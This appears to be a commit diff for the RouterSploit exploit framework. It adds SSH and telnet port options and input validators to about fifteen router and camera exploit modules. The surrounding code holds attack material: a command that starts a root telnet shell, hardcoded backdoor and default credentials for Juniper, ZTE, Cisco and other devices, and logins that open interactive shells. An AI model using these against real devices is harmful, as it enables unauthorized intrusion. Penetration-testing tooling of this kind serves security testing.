Adding FTP,SSH,Telnet ports option (threat9#264)

routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py

@@ -5,6 +5,7 @@
     mute,
     print_error,
     print_success,
+    validators,
 )
 
 
@@ -26,8 +27,8 @@ class Exploit(exploits.Exploit):
         ],
     }
 
-    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')  # target address
-    telnet_port = exploits.Option(23, 'Target port')  # default port
+    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.ipv4)  # target address
+    telnet_port = exploits.Option(23, 'Target port', validators=validators.integer)  # default port
 
     def run(self):
         if self.check():

routersploit/modules/exploits/routers/belkin/play_max_prce.py

@@ -32,7 +32,7 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
-    port = exploits.Option(80, 'Target Port')
+    port = exploits.Option(80, 'Target Port', validators=validators.integer)
     cmd = exploits.Option('telnetd', 'Command to execute')
 
     def auth_bypass(self):

routersploit/modules/exploits/routers/billion/5200w_rce.py

@@ -35,11 +35,11 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
-    port = exploits.Option(80, 'Target port')  # default port
+    port = exploits.Option(80, 'Target port', validators=validators.integer)  # default port
+    telnet_port = exploits.Option(9999, 'Telnet port used for exploitation', validators=validators.integer)  # telnet port used for exploitation
 
     username = exploits.Option('admin', 'Default username to log in')
     password = exploits.Option('password', 'Default password to log in')
-    telnetport = exploits.Option(9999, 'Telnet port used for exploitation')
 
     # hardcoded credentials
     creds = [
@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
     ]
 
     def run(self):
-        cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnetport)
+        cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnet_port)
 
         if self.execute1(cmd) or self.execute2(cmd):
             self.telnet_connect()
@@ -134,11 +134,11 @@ def telnet_connect(self):
         print_status("Trying to connect to the telnet server...")
 
         try:
-            tn = telnetlib.Telnet(target, self.telnetport)
+            tn = telnetlib.Telnet(target, self.telnet_port)
             tn.interact()
             tn.close()
         except:
-            print_error("Exploit failed - Telnet connection error: {}:{}".format(target, self.telnetport))
+            print_error("Exploit failed - Telnet connection error: {}:{}".format(target, self.telnet_port))
 
     @mute
     def check(self):

routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py

@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
     telnet_port = exploits.Option(23, 'Target Port', validators=validators.integer)
 
     action = exploits.Option('set', 'set / unset credless authentication for Telnet service')
-    device = exploits.Option(-1, 'Target device - use "show devices"', validators=int)
+    device = exploits.Option(-1, 'Target device - use "show devices"', validators=validators.integer)
 
     payloads = [
         # Cisco Catalyst 2960 IOS 12.2(55)SE1

routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py

@@ -39,7 +39,8 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target IP address', validators=validators.url)
-    port = exploits.Option(443, 'Target Port')
+    port = exploits.Option(443, 'Target Port', validators=validators.integer)
+    ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer)
 
     username = exploits.Option('admin', 'Default username to log in')
     password = exploits.Option('Admin123', 'Default password to log in')
@@ -81,7 +82,7 @@ def check(self):
             target = self.target.replace("http://", "").replace("https://", "")
 
             try:
-                ssh.connect(target, 22, timeout=5, username=random_text(8), password=random_text(8))
+                ssh.connect(target, self.ssh_port, timeout=5, username=random_text(8), password=random_text(8))
             except paramiko.AuthenticationException:
                     return True  # target is vulnerable
             except:
@@ -155,7 +156,7 @@ def init_ssh_session(self, username, password):
 
         target = self.target.replace("http://", "").replace("https://", "")
         try:
-            ssh.connect(target, 22, timeout=5, username=username, password=password)
+            ssh.connect(target, self.ssh_port, timeout=5, username=username, password=password)
         except:
             ssh.close()
         else:

routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py

@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
-    port = exploits.Option(80, 'Target Port')
+    port = exploits.Option(80, 'Target Port', validators=validators.integer)
 
     def run(self):
         if self.check():

routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py

@@ -7,6 +7,7 @@
     print_success,
     print_status,
     mute,
+    validators,
 )
 
 
@@ -30,7 +31,8 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target address e.g. 192.168.1.1')
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)
+    telnet_port = exploits.Option(23, 'Target telnet port', validators=validators.integer)
 
     def run(self):
         sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@@ -49,10 +51,10 @@ def run(self):
 
         if "Hello" in response:
             print_success("Target seems to vulnerable")
-            print_status("Trying to connect to the telnet service {}:{}".format(self.target, 23))
+            print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port))
 
             try:
-                tn = telnetlib.Telnet(self.target, 23)
+                tn = telnetlib.Telnet(self.target, self.telnet_port)
                 tn.interact()
             except:
                 print_error("Exploit failed - could not connect to the telnet service")

routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py

@@ -9,6 +9,7 @@
     print_status,
     mute,
     ssh_interactive,
+    validators,
 )
 
 
@@ -34,15 +35,15 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target IP address')
-    port = exploits.Option(22, 'Target Port')
+    target = exploits.Option('', 'Target IP address', validators=validators.ipv4)
+    ssh_port = exploits.Option(22, 'Target Port', validators=validators.integer)
 
     def run(self):
         client = paramiko.SSHClient()
         client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
         try:
-            client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
+            client.connect(self.target, self.ssh_port, username='', allow_agent=False, look_for_keys=False)
         except paramiko.ssh_exception.SSHException:
             pass
         except:
@@ -73,7 +74,7 @@ def check(self):
         client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
         try:
-            client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
+            client.connect(self.target, self.ssh_port, username='', allow_agent=False, look_for_keys=False)
         except paramiko.ssh_exception.SSHException:
             pass
         except:

routersploit/modules/exploits/routers/huawei/hg630a_default_creds.py

@@ -33,6 +33,8 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target IP address', validators=validators.address)  # target address
+    ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer)  # target port
+
     user = exploits.Option('admin', 'Default username to log in with')
     password = exploits.Option('admin', 'Default password to log in with')
 
@@ -41,7 +43,7 @@ def run(self):
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
         try:
-            ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
+            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.user, password=self.password)
         except (paramiko.ssh_exception.SSHException, socket.error):
             print_error("Exploit failed - cannot log in with credentials {} / {}".format(self.user, self.password))
             return
@@ -55,7 +57,7 @@ def check(self):
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
         try:
-            ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
+            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.user, password=self.password)
         except (paramiko.ssh_exception.SSHException, socket.error):
             return False  # target is not vulnerable
         else:

routersploit/modules/exploits/routers/juniper/screenos_backdoor.py

@@ -7,6 +7,7 @@
     print_error,
     mute,
     ssh_interactive,
+    validators,
 )
 
 
@@ -31,7 +32,9 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)  # target address
+    ssh_port = exploits.Option(22, 'Target SSH port', validators=validators.integer)  # target ssh port
+    telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer)  # target telnet port
 
     username = "admin"
     password = "<<< %s(un='%s') = %u"
@@ -41,7 +44,7 @@ def run(self):
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
         try:
-            ssh.connect(self.target, 22, timeout=5, username=self.username, password=self.password)
+            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
         except:
             ssh.close()
         else:
@@ -50,7 +53,7 @@ def run(self):
             return
 
         try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
             tn.write("\r\n")
             tn.expect(["Login: ", "login: "], 5)
             tn.write(self.username + "\r\n")
@@ -79,14 +82,14 @@ def check(self):
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
         try:
-            ssh.connect(self.target, 22, timeout=5, username=self.username, password=self.password)
+            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
         except:
             ssh.close()
         else:
             return True
 
         try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
             tn.write("\r\n")
             tn.expect(["Login: ", "login: "], 5)
             tn.write(self.username + "\r\n")

routersploit/modules/exploits/routers/multi/ssh_auth_keys.py

@@ -56,6 +56,7 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address)  # target address
+    ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.port)  # target port
 
     private_keys = [
         {  # ExaGrid firmware < 4.8 P26
@@ -250,7 +251,7 @@ def run(self):
             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
             try:
-                ssh.connect(self.target, 22, timeout=5, username=self.valid['user'], pkey=pkey)
+                ssh.connect(self.target, self.ssh_port, timeout=5, username=self.valid['user'], pkey=pkey)
             except:
                 ssh.close()
                 print_error("Device seems to be not vulnerable")
@@ -274,7 +275,7 @@ def check(self):
             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
             try:
-                ssh.connect(self.target, 22, timeout=5, username=key['user'], pkey=pkey)
+                ssh.connect(self.target, self.ssh_port, timeout=5, username=key['user'], pkey=pkey)
             except:
                 ssh.close()
             else:

routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py

@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
-    port = exploits.Option(80, 'Target Port')
+    port = exploits.Option(80, 'Target Port', validators=validators.integer)
 
     def run(self):
         if self.check():

routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py

@@ -38,7 +38,8 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target address e.g. https://192.168.1.1', validators=validators.url)  # Target address
-    port = exploits.Option(443, 'Target port e.g. 443')  # Default port
+    port = exploits.Option(443, 'Target port e.g. 443', validators=validators.integer)  # Default port
+    ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer)  # target ssh port
 
     def run(self):
         if self.check():
@@ -78,7 +79,7 @@ def run(self):
             ip_target = ip_target.replace('http://', '')
             ip_target = ip_target.replace('/', '')
 
-            client.connect(ip_target, 22, username='ubnt', pkey=pkey)
+            client.connect(ip_target, self.ssh_port, username='ubnt', pkey=pkey)
             ssh_interactive(client)
 
         else:

routersploit/modules/exploits/routers/zte/f609_config_disclosure.py

@@ -6,6 +6,7 @@
     print_success,
     print_error,
     mute,
+    validators,
 )
 
 
@@ -29,15 +30,17 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)  # target address
+    telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer)  # target telnet port
+
     username = exploits.Option("root", "Username to authenticate with")  # telnet username, default root
     password = exploits.Option("Zte521", "Password to authenticate with")  # telnet password, default Zte521
     config = "sendcmd 1 DB p DevAuthInfo"
 
     def run(self):
         try:
             print_status("Trying to authenticate to the telnet server")
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
             tn.expect(["Login: ", "login: "], 5)
             tn.write(self.username + "\r\n")
             tn.expect(["Password: ", "password"], 5)
@@ -58,12 +61,12 @@ def run(self):
 
             tn.close()
         except:
-            print_error("Connection error: {}:{}".format(self.target, 23))
+            print_error("Connection error: {}:{}".format(self.target, self.telnet_port))
 
     @mute
     def check(self):
         try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
             tn.expect(["Login: ", "login: "], 5)
             tn.write(self.username + "\r\n")
             tn.expect(["Password: ", "password"], 5)

routersploit/modules/exploits/routers/zte/f6xx_default_root.py

@@ -6,6 +6,7 @@
     print_success,
     print_error,
     mute,
+    validators,
 )
 
 
@@ -30,14 +31,16 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)  # target address
+    telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer)  # target telnet port
+
     username = exploits.Option("root", "Username to authenticate with")  # telnet username, default root
     password = exploits.Option("Zte521", "Password to authenticate with")  # telnet password, default Zte521
 
     def run(self):
         try:
             print_status("Trying to authenticate to the telnet server")
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
             tn.expect(["Login: ", "login: "], 5)
             tn.write(self.username + "\r\n")
             tn.expect(["Password: ", "password"], 5)
@@ -58,12 +61,12 @@ def run(self):
 
             tn.close()
         except:
-            print_error("Connection error {}:23".format(self.target))
+            print_error("Connection error {}:{}".format(self.target, self.telnet_port))
 
     @mute
     def check(self):
         try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
             tn.expect(["Login: ", "login: "], 5)
             tn.write(self.username + "\r\n")
             tn.expect(["Password: ", "password"], 5)